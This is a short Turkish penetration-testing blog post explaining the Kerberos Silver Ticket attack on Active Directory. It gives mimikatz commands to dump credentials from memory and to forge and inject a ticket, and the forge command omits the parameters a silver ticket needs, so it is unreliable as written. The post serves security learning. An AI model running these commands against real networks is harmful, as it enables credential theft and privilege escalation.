Published November 6, 2019 by

Kerberos | Silver Ticket

Okunması gereken yazılar:

Silver Ticket tekniğinde saldırganın amacı, hizmet veren servis hesabına ait NTLM hash’i ile TGS oluşturarak domain üzerindeki yetkilerini yükseltmektir.

Silver Ticket’ı oluşturmak için servise ait olan kullanıcının NTLM hash’in bilinmesi gerekmektedir (Bknz. Kerberoasting).

Makine üzerindeki NTLM hash’lerini almak için mimikatz’i kullanabiliriz.

mimikatz# privilege::debug
mimikatz# sekurlsa::logonpasswords

Mimikatz yardımı ile Silver Ticket’ı oluşturabiliriz.

mimikatz# kerberos::golden /user:evil /domain:pentest.local /sid:S-1-5-21-434157810-3574284310-2996746512-500  /ticket:evil.tck /ptt

Referanslar

How Attackers Use Kerberos Silver Tickets to Exploit Systems

https://www.tarlogic.com/en/blog/how-to-attack-kerberos/

Umut

Umut

Active Directory Cyber Security Penetration Testing

kerberos kerberos silver ticket silver ticket

2 Comments

  2. semih said:

    gereksiz bir şey olcak ama Macbookda kullandığınız font nedir acaba

    March 22, 2020
    Reply

Leave a Reply to Kerberos Protokolü Nedir ? Kerberos'a Yapılabilecek Saldırılar Nelerdir ? – Barış Koparmal Cancel reply

Your email address will not be published.